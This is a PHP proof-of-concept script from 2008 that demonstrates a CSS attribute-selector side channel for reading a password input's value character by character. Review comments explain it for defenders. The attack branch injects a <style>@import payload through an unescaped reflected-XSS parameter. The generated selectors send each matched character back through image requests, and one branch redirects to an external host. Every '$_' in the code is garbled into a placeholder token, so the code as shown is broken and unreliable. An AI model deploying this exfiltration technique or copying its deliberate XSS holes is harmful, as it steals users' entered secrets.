<?php
/***** BEGIN LICENSE BLOCK *****
CSSH - a proof of concept CSS based history crawler
Copyright (C) 2008 Sirdarckcat
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
***** END LICENSE BLOCK *****/
// Overview (review): proof-of-concept for a CSS-based side channel. The
// stylesheet served by the ?css branch uses attribute selectors
// (input[value^=...], input[value$=...], input[value=...]) whose
// background-image URLs point back at this script (?backend&d=...), so the
// browser's image requests reveal which prefix/suffix of the input's value
// matched, and the session accumulates the result. The demo's only way in
// is this script's own weaknesses, visible below: $_GET['xss'] is echoed
// unescaped into the page head (reflected XSS) and a password field is
// pre-filled from the session. Defender take-aways: escape every reflected
// value (htmlspecialchars), never pre-fill password inputs, validate $d and
// $i, and a Content-Security-Policy that restricts style-src/img-src would
// block both the injected @import and the outbound image callbacks.
// NOTE(review): the token `___FCKpd___0` followed by a line break appears to
// be an extraction artifact standing in for `$_` ($_GET, $_SESSION, $_POST,
// $_value); the code is left exactly as found.
if (isset(___FCKpd___0
GET['source'])) {
// ?source serves this script's own source, syntax-highlighted.
highlight_file(__FILE__);
exit();
}
session_start();
$file=basename(__FILE__);
// $d selects the mode and $i carries a reported character; both are taken
// straight from the query string with no validation, type check or
// escaping, and $i is later written into the session and echoed into CSS.
$d=___FCKpd___0
GET['d'];
$i=___FCKpd___0
GET['i'];
if(isset(___FCKpd___0
GET['logout']))
session_destroy();
// ?debug dumps the merged request and session arrays into the response.
if(isset(___FCKpd___0
GET['debug']))
print_r(___FCKpd___0
GET+___FCKpd___0
SESSION);
if(isset(___FCKpd___0
GET['css'])){
// --- CSS generator: produces the stylesheet loaded by the injected @import.
switch($d){
case 'range':
// Reset the session state and seed the candidate set with chr(16)..chr(127).
// The commented-out echo would have emitted one probe selector per
// candidate character; as written, all candidates are assumed present.
ob_start("ob_gzhandler");
___FCKpd___0
SESSION['range']=Array();
___FCKpd___0
SESSION['value_']="";
___FCKpd___0
SESSION['_value']="";
for($i=16;$i<=127;$i++){
//echo 'input[value*="\\'.dechex($i).'"]{background:url("'.$file.'?backend&d=range&i=%'.dechex($i).'");}';
___FCKpd___0
SESSION['range'][]=chr($i);
}
// No branch of this script checks $_GET['finished']; such a request falls
// through to the final else branch and renders the form page.
echo "body{background:url('$file?finished');}";
break;
case 'reading':
// Block until the 'range' request has populated the session (polling once
// per second), then wait a further 5 seconds (author's note below).
while(empty(___FCKpd___0
SESSION['range']))sleep(1);
sleep(5);//session_start() locks the file loading, and we wait 5 seconds for reading next char
ob_start("ob_gzhandler");
$range=___FCKpd___0
SESSION['range'];
// urlencode() then '%' -> '\' turns the known prefix/suffix into CSS
// hex-escape form (e.g. "%41" becomes "\41") for use inside the selectors.
// No other escaping is applied, although the data originates from $_GET['i'].
$value_=strtr(urlencode(___FCKpd___0
SESSION['value_']),"%","\\");
___FCKpd___0
value=strtr(urlencode(___FCKpd___0
SESSION['_value']),"%","\\");
foreach($range as $char){
$i=ord($char);
// Three selectors per candidate: prefix match reports d=beg, suffix match
// reports d=end (via the next sibling), exact match reports d=fin with the
// full reconstructed value. Each match fires one request back to ?backend.
echo 'input[value^="'.$value_.'\\'.dechex($i).'"]{background:url("'.$file.'?backend&d=beg&i=%'.dechex($i).'");}';
echo 'input[value$="\\'.dechex($i).___FCKpd___0
value.'"] + *{background:url("'.$file.'?backend&d=end&i=%'.dechex($i).'");}';
echo 'input[value="'.$value_."\\".dechex($i).___FCKpd___0
value.'"]+*+*{background:url("'.$file.'?backend&d=fin&i='.$value_.___FCKpd___0
value.'");}';
echo "\n";
}
break;
}
}else if(isset(___FCKpd___0
GET['backend'])){
// --- Callback receiver: records what the browser's image requests report.
switch($d){
case 'range':
// Appends the reported character to the candidate set, then redirects the
// image request to an external host hard-coded in this file.
___FCKpd___0
SESSION['range'][]=$i;
header('Location: http://p42.us/x.png');
break;
case 'beg':
// Note there is no break after 'beg' or 'end': a 'beg' report also runs the
// 'end' and 'fin' assignments below, and an 'end' report also runs 'fin'.
___FCKpd___0
SESSION['value_'].=$i;
case 'end':
___FCKpd___0
SESSION['_value']=$i.___FCKpd___0
SESSION['_value'];
case 'fin':
___FCKpd___0
SESSION['value']=$i;
break;
}
}else if(isset(___FCKpd___0
GET['attack'])){
// --- Demo driver: seven iframes load this script's form page with a
// <style>@import ...</style> payload in ?xss; the first imports ?css&d=range,
// the rest ?css&d=reading. The varying "/_" path-info suffixes presumably
// keep each @import URL distinct — not verifiable from this file.
?>
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_?css%26d=range%22%3B</style>"></iframe>
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_?css%26d=reading%22%3B</style>"/></iframe>
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_?css%26d=reading%22%3B</style>"/></iframe>
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe>
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe>
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe>
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe>
<?php
}else{
// --- Default page: a form whose submitted password is stored in the session
// and echoed back, unescaped, as the input's value attribute on later loads.
if(isset(___FCKpd___0
POST['pass'])){
___FCKpd___0
SESSION['knownvalue']=___FCKpd___0
POST['pass'];
}
// Both echoes in the HTML below are unescaped: $_GET['xss'] goes straight
// into <head> (the reflected XSS the demo relies on) and
// $_SESSION['knownvalue'] into a quoted attribute. Wrapping each in
// htmlspecialchars(..., ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') and not
// pre-filling the password field would remove the entry point.
?>
<html>
<head>
<title>Start</title>
<?php echo ___FCKpd___0
GET['xss'];?>
</head>
<body>
<form method=POST>
Enter something here and press enter <input name="pass" type="password" value="<?php echo ___FCKpd___0
SESSION['knownvalue']; ?>"/>
</form>
</body>
</html>
<?php
}
?>